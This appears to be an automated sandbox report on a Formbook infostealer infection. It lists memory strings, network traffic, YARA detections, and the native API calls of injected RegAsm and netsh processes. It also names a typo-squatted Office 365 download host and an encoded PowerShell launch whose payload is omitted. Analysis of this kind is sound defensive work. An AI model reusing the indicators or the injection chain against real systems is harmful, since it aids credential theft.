Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: powershell.exe, 00000003.00000002.1517714752.000002B59E2B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ofice365.github.io
Source: powershell.exe, 00000003.00000002.1517714752.000002B59E2B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ofice365.github.io/1/test.jpg09
Source: explorer.exe, 00000007.00000000.1536456695.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2668928714.000000000CF36000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000007.00000000.1536456695.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2668928714.000000000CF36000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.com
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000007.00000000.1523845606.0000000009CEC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071685840.0000000009CEC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2662764839.0000000009CEC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/t.dllll
Source: explorer.exe, 00000007.00000000.1536456695.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2668928714.000000000CF36000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown HTTPS traffic detected: 185.199.109.153:443 -> 192.168.2.4:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 16.15.192.227:443 -> 192.168.2.4:49721 version: TLS 1.2

E-Banking Fraud

Source: Yara match File source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2654798948.0000000000CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1641106278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2654692262.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2654885406.0000000000DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2654798948.0000000000CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2654798948.0000000000CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2654798948.0000000000CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.1641106278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.1641106278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.1641106278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2654692262.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2654692262.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2654692262.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2654885406.0000000000DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2654885406.0000000000DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2654885406.0000000000DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: powershell.exe PID: 7388, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7876, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: RegAsm.exe PID: 1984, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: netsh.exe PID: 4756, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = '[encoded command-line payload omitted]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0041A330 NtCreateFile, 6_2_0041A330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0041A3E0 NtReadFile, 6_2_0041A3E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0041A460 NtClose, 6_2_0041A460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0041A510 NtAllocateVirtualMemory, 6_2_0041A510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0041A32B NtCreateFile, 6_2_0041A32B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0041A382 NtReadFile, 6_2_0041A382
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0041A45A NtClose, 6_2_0041A45A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0041A50A NtAllocateVirtualMemory, 6_2_0041A50A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102B60 NtClose,LdrInitializeThunk, 6_2_03102B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_03102BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102AD0 NtReadFile,LdrInitializeThunk, 6_2_03102AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102F30 NtCreateSection,LdrInitializeThunk, 6_2_03102F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102F90 NtProtectVirtualMemory,LdrInitializeThunk, 6_2_03102F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102FB0 NtResumeThread,LdrInitializeThunk, 6_2_03102FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102FE0 NtCreateFile,LdrInitializeThunk, 6_2_03102FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102E80 NtReadVirtualMemory,LdrInitializeThunk, 6_2_03102E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_03102EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102D10 NtMapViewOfSection,LdrInitializeThunk, 6_2_03102D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102D30 NtUnmapViewOfSection,LdrInitializeThunk, 6_2_03102D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102DD0 NtDelayExecution,LdrInitializeThunk, 6_2_03102DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102DF0 NtQuerySystemInformation,LdrInitializeThunk, 6_2_03102DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102C70 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_03102C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102CA0 NtQueryInformationToken,LdrInitializeThunk, 6_2_03102CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03104340 NtSetContextThread, 6_2_03104340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03103010 NtOpenDirectoryObject, 6_2_03103010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03103090 NtSetValueKey, 6_2_03103090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03104650 NtSuspendThread, 6_2_03104650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031035C0 NtCreateMutant, 6_2_031035C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102B80 NtQueryInformationFile, 6_2_03102B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102BA0 NtEnumerateValueKey, 6_2_03102BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102BE0 NtQueryValueKey, 6_2_03102BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102AB0 NtWaitForSingleObject, 6_2_03102AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102AF0 NtWriteFile, 6_2_03102AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031039B0 NtGetContextThread, 6_2_031039B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102F60 NtCreateProcessEx, 6_2_03102F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102FA0 NtQuerySection, 6_2_03102FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102E30 NtWriteVirtualMemory, 6_2_03102E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102EE0 NtQueueApcThread, 6_2_03102EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03103D10 NtOpenProcessToken, 6_2_03103D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102D00 NtSetInformationFile, 6_2_03102D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03103D70 NtOpenThread, 6_2_03103D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102DB0 NtEnumerateKey, 6_2_03102DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102C00 NtQueryInformationProcess, 6_2_03102C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102C60 NtCreateKey, 6_2_03102C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102CC0 NtQueryVirtualMemory, 6_2_03102CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102CF0 NtOpenProcess, 6_2_03102CF0
Source: C:\Windows\explorer.exe Code function: 7_2_0F3E3232 NtCreateFile, 7_2_0F3E3232
Source: C:\Windows\explorer.exe Code function: 7_2_0F3E4E12 NtProtectVirtualMemory, 7_2_0F3E4E12
Source: C:\Windows\explorer.exe Code function: 7_2_0F3E4E0A NtProtectVirtualMemory, 7_2_0F3E4E0A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_035135C0 NtCreateMutant,LdrInitializeThunk, 8_2_035135C0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512B60 NtClose,LdrInitializeThunk, 8_2_03512B60
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512AD0 NtReadFile,LdrInitializeThunk, 8_2_03512AD0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512F30 NtCreateSection,LdrInitializeThunk, 8_2_03512F30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512FE0 NtCreateFile,LdrInitializeThunk, 8_2_03512FE0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_03512EA0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512D10 NtMapViewOfSection,LdrInitializeThunk, 8_2_03512D10
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512DD0 NtDelayExecution,LdrInitializeThunk, 8_2_03512DD0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512DF0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_03512DF0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512C70 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_03512C70
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512C60 NtCreateKey,LdrInitializeThunk, 8_2_03512C60
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512CA0 NtQueryInformationToken,LdrInitializeThunk, 8_2_03512CA0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03514340 NtSetContextThread, 8_2_03514340
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03513010 NtOpenDirectoryObject, 8_2_03513010
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03513090 NtSetValueKey, 8_2_03513090
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03514650 NtSuspendThread, 8_2_03514650
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512BF0 NtAllocateVirtualMemory, 8_2_03512BF0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512BE0 NtQueryValueKey, 8_2_03512BE0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512B80 NtQueryInformationFile, 8_2_03512B80
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512BA0 NtEnumerateValueKey, 8_2_03512BA0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512AF0 NtWriteFile, 8_2_03512AF0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512AB0 NtWaitForSingleObject, 8_2_03512AB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_035139B0 NtGetContextThread, 8_2_035139B0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512F60 NtCreateProcessEx, 8_2_03512F60
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512F90 NtProtectVirtualMemory, 8_2_03512F90
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512FB0 NtResumeThread, 8_2_03512FB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512FA0 NtQuerySection, 8_2_03512FA0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512E30 NtWriteVirtualMemory, 8_2_03512E30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512EE0 NtQueueApcThread, 8_2_03512EE0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512E80 NtReadVirtualMemory, 8_2_03512E80
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03513D70 NtOpenThread, 8_2_03513D70
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03513D10 NtOpenProcessToken, 8_2_03513D10
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512D00 NtSetInformationFile, 8_2_03512D00
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512D30 NtUnmapViewOfSection, 8_2_03512D30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512DB0 NtEnumerateKey, 8_2_03512DB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512C00 NtQueryInformationProcess, 8_2_03512C00
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512CC0 NtQueryVirtualMemory, 8_2_03512CC0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512CF0 NtOpenProcess, 8_2_03512CF0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00B1A3E0 NtReadFile, 8_2_00B1A3E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00B1A330 NtCreateFile, 8_2_00B1A330
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00B1A460 NtClose, 8_2_00B1A460
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00B1A382 NtReadFile, 8_2_00B1A382
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00B1A32B NtCreateFile, 8_2_00B1A32B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00B1A45A NtClose, 8_2_00B1A45A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03249BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, 8_2_03249BAF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0324A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread, 8_2_0324A036
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03249BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 8_2_03249BB2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0324A042 NtQueryInformationProcess, 8_2_0324A042
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0313EA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 03105130 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 03117E54 appears 89 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0314F290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 030BB970 appears 268 times
